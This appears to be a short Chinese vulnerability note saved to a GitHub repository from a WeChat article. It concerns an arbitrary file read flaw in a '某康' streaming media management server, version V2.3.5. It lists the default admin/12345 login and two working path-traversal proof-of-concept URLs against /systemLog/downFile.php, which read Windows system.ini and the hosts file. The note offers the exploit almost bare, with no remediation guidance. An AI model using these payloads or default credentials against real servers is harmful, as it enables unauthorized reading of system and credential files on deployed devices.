Skip to content

Latest commit

 

History

History
15 lines (8 loc) · 751 Bytes

某康任意文件读取漏洞.md

File metadata and controls

15 lines (8 loc) · 751 Bytes

本文由 简悦 SimpRead 转码, 原文地址 mp.weixin.qq.com

流媒体管理服务器 V2.3.5

登录页面如下,默认账号密码为 admin/12345

POC

/systemLog/downFile.php?fileName=../../../../../../../../../../../../../../../windows/system.ini

/systemLog/downFile.php?fileName=../../../../../../../../../../../../../../../Windows/System32/drivers/etc/hosts